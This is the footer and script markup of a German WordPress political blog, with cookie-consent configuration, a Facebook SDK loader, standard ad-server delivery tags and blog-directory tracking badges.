			<li><a href="https://www.politikexpress.de" title="Top News aus der Politik und Gesellschaft">START</a></li>
			<li class="page_item page-item-2"><a href="https://www.politikexpress.de/impressum-html">Impressum</a></li>
<li class="page_item page-item-1611819"><a href="https://www.politikexpress.de/datenschutz">Datenschutz</a></li>
			<li class="last"><a href="https://www.politikexpress.de/feed" rel="nofollow" title="Neueste Artikel per RSS">RSS</a></li>			
		</ul>
		</div>
	
	
	
	<div class="clear"></div>
	
	<div id="footer-left-side">
					<a href="#top" title="Politikexpress" rel="home"><strong>&uarr;</strong> Politikexpress</a>
			</div><!-- #site-info -->
			
	<div id="footer-right-side">
		<a rel="nofollow" href="https://www.politikexpress.de/wp-login.php">Anmelden</a> - 
				<a rel="nofollow" href="http://wordpress.org/" title="Semantic Personal Publishing Platform" rel="generator">Powered by WordPress</a> - 
		Copyright by <a href="http://www.layermedia.eu/" title="LayerMedia">LayerMedia</a> 
		<!-- Powered by WPtouch Pro: 3.7 -->
	<div id="fb-root"></div>
	<script type='text/javascript'>
	<!--
	(function(d, s, id) {
	  var js, fjs = d.getElementsByTagName(s)[0];
	  if (d.getElementById(id)) return;
	  js = d.createElement(s); js.id = id;
	  js.src = "//connect.facebook.net/de_DE/all.js#xfbml=1";
	  fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));
	// -->
	</script><!--googleoff: all--><div data-nosnippet><script id="BorlabsCookieBoxWrap" type="text/template">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</script></div><!--googleon: all--><script type='text/javascript' src='https://www.politikexpress.de/wp-includes/js/wp-embed.min.js?ver=5.7.2' id='wp-embed-js'></script>
<script async="async" type='text/javascript' src='https://www.politikexpress.de/wp-content/plugins/akismet/_inc/form.js?ver=4.1.9' id='akismet-form-js'></script>
<script type='text/javascript' id='borlabs-cookie-js-extra'>
/* <![CDATA[ */
var borlabsCookieConfig = {"ajaxURL":"https:\/\/www.politikexpress.de\/wp-admin\/admin-ajax.php","language":"de","animation":"1","animationDelay":"","animationIn":"fadeInDown","animationOut":"flipOutX","blockContent":"1","boxLayout":"box","boxLayoutAdvanced":"1","automaticCookieDomainAndPath":"","cookieDomain":"www.politikexpress.de","cookiePath":"\/","cookieLifetime":"365","crossDomainCookie":[],"cookieBeforeConsent":"","cookiesForBots":"1","cookieVersion":"1","hideCookieBoxOnPages":[],"respectDoNotTrack":"","reloadAfterConsent":"","showCookieBox":"1","cookieBoxIntegration":"javascript","ignorePreSelectStatus":"1","cookies":{"essential":["borlabs-cookie"],"statistics":[],"marketing":[],"external-media":["facebook","googlemaps","instagram","openstreetmap","twitter","vimeo","youtube"]}};
var borlabsCookieCookies = {"essential":{"borlabs-cookie":{"cookieNameList":{"borlabs-cookie":"borlabs-cookie"},"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"}}},"external-media":{"facebook":{"cookieNameList":[],"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"},"optInJS":"PHNjcmlwdD5pZih0eXBlb2Ygd2luZG93LkJvcmxhYnNDb29raWUgPT09ICJvYmplY3QiKSB7IHdpbmRvdy5Cb3JsYWJzQ29va2llLnVuYmxvY2tDb250ZW50SWQoImZhY2Vib29rIik7IH08L3NjcmlwdD4=","optOutJS":""},"googlemaps":{"cookieNameList":{"NID":"NID"},"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"},"optInJS":"PHNjcmlwdD5pZih0eXBlb2Ygd2luZG93LkJvcmxhYnNDb29raWUgPT09ICJvYmplY3QiKSB7IHdpbmRvdy5Cb3JsYWJzQ29va2llLnVuYmxvY2tDb250ZW50SWQoImdvb2dsZW1hcHMiKTsgfTwvc2NyaXB0Pg==","optOutJS":""},"instagram":{"cookieNameList":{"pigeon_state":"pigeon_state"},"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"},"optInJS":"PHNjcmlwdD5pZih0eXBlb2Ygd2luZG93LkJvcmxhYnNDb29raWUgPT09ICJvYmplY3QiKSB7IHdpbmRvdy5Cb3JsYWJzQ29va2llLnVuYmxvY2tDb250ZW50SWQoImluc3RhZ3JhbSIpOyB9PC9zY3JpcHQ+","optOutJS":""},"openstreetmap":{"cookieNameList":{"_osm_location":"_osm_location","_osm_session":"_osm_session","_osm_totp_token":"_osm_totp_token","_osm_welcome":"_osm_welcome","_pk_id.":"_pk_id.","_pk_ref.":"_pk_ref.","_pk_ses.":"_pk_ses.","qos_token":"qos_token"},"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"},"optInJS":"PHNjcmlwdD5pZih0eXBlb2Ygd2luZG93LkJvcmxhYnNDb29raWUgPT09ICJvYmplY3QiKSB7IHdpbmRvdy5Cb3JsYWJzQ29va2llLnVuYmxvY2tDb250ZW50SWQoIm9wZW5zdHJlZXRtYXAiKTsgfTwvc2NyaXB0Pg==","optOutJS":""},"twitter":{"cookieNameList":{"__widgetsettings":"__widgetsettings","local_storage_support_test":"local_storage_support_test"},"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"},"optInJS":"PHNjcmlwdD5pZih0eXBlb2Ygd2luZG93LkJvcmxhYnNDb29raWUgPT09ICJvYmplY3QiKSB7IHdpbmRvdy5Cb3JsYWJzQ29va2llLnVuYmxvY2tDb250ZW50SWQoInR3aXR0ZXIiKTsgfTwvc2NyaXB0Pg==","optOutJS":""},"vimeo":{"cookieNameList":{"vuid":"vuid"},"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"},"optInJS":"PHNjcmlwdD5pZih0eXBlb2Ygd2luZG93LkJvcmxhYnNDb29raWUgPT09ICJvYmplY3QiKSB7IHdpbmRvdy5Cb3JsYWJzQ29va2llLnVuYmxvY2tDb250ZW50SWQoInZpbWVvIik7IH08L3NjcmlwdD4=","optOutJS":""},"youtube":{"cookieNameList":{"NID":"NID"},"settings":{"blockCookiesBeforeConsent":"0","prioritize":"0"},"optInJS":"PHNjcmlwdD5pZih0eXBlb2Ygd2luZG93LkJvcmxhYnNDb29raWUgPT09ICJvYmplY3QiKSB7IHdpbmRvdy5Cb3JsYWJzQ29va2llLnVuYmxvY2tDb250ZW50SWQoInlvdXR1YmUiKTsgfTwvc2NyaXB0Pg==","optOutJS":""}}};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-content/plugins/borlabs-cookie/javascript/borlabs-cookie.min.js?ver=2.2.27' id='borlabs-cookie-js'></script>
<script type='text/javascript' id='borlabs-cookie-js-after'>
document.addEventListener("DOMContentLoaded", function (e) {
var borlabsCookieContentBlocker = {"facebook": {"id": "facebook","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) { if(typeof FB === "object") { FB.XFBML.parse(el.parentElement); } },"settings": {"executeGlobalCodeBeforeUnblocking":false}},"default": {"id": "default","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) {  },"settings": {"executeGlobalCodeBeforeUnblocking":false}},"googlemaps": {"id": "googlemaps","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) {  },"settings": {"executeGlobalCodeBeforeUnblocking":false}},"instagram": {"id": "instagram","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) { if (typeof instgrm === "object") { instgrm.Embeds.process(); } },"settings": {"executeGlobalCodeBeforeUnblocking":false}},"openstreetmap": {"id": "openstreetmap","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) {  },"settings": {"executeGlobalCodeBeforeUnblocking":false}},"twitter": {"id": "twitter","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) {  },"settings": {"executeGlobalCodeBeforeUnblocking":false}},"vimeo": {"id": "vimeo","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) {  },"settings": {"executeGlobalCodeBeforeUnblocking":false,"saveThumbnails":false,"videoWrapper":false}},"youtube": {"id": "youtube","global": function (contentBlockerData) {  },"init": function (el, contentBlockerData) {  },"settings": {"executeGlobalCodeBeforeUnblocking":false,"changeURLToNoCookie":true,"saveThumbnails":false,"thumbnailQuality":"maxresdefault","videoWrapper":false}}};
    var BorlabsCookieInitCheck = function () {

    if (typeof window.BorlabsCookie === "object" && typeof window.jQuery === "function") {

        if (typeof borlabsCookiePrioritized !== "object") {
            borlabsCookiePrioritized = { optInJS: {} };
        }

        window.BorlabsCookie.init(borlabsCookieConfig, borlabsCookieCookies, borlabsCookieContentBlocker, borlabsCookiePrioritized.optInJS);
    } else {
        window.setTimeout(BorlabsCookieInitCheck, 50);
    }
};

BorlabsCookieInitCheck();});
</script>
	</div> <!-- #footer-right-side -->
	<div class="clear"></div>
</div><!-- /footer -->


<!--/* SkyScraper fixed */-->

<div style="position:fixed;left:995px;top:120px">

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=175");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>

</div><!-- /SkyScraper -->	

<!--/* LayerAd */-->

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=643");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>


<!--/* PopUnder */-->

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=644");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>


<!--/* PopUnder Valuebrand */-->

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=645");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script>

<center>
<a rel="nofollow" href="https://www.topblogs.de/"><img border="0" src="https://www.topblogs.de/tracker.php?do=in&id=12923" alt="Blog Top Liste - by TopBlogs.de" /></a>
<a rel="nofollow" href="https://www.bloggerei.de/rubrik_2_Politikblogs" title="Blog-Verzeichnis"><img src="https://www.bloggerei.de/bgpublicon.jpg" width="80" height="15" border="0" alt="Blogverzeichnis - Blog Verzeichnis bloggerei.de" /></a>
</center>

<script type="text/javascript">
<!--
if(typeof(asm_initi) != "undefined"){asm_finishwriter();}
//-->
</script>

</body>
</html><!-- hyper cache 2021-06-22 09:21:37 -->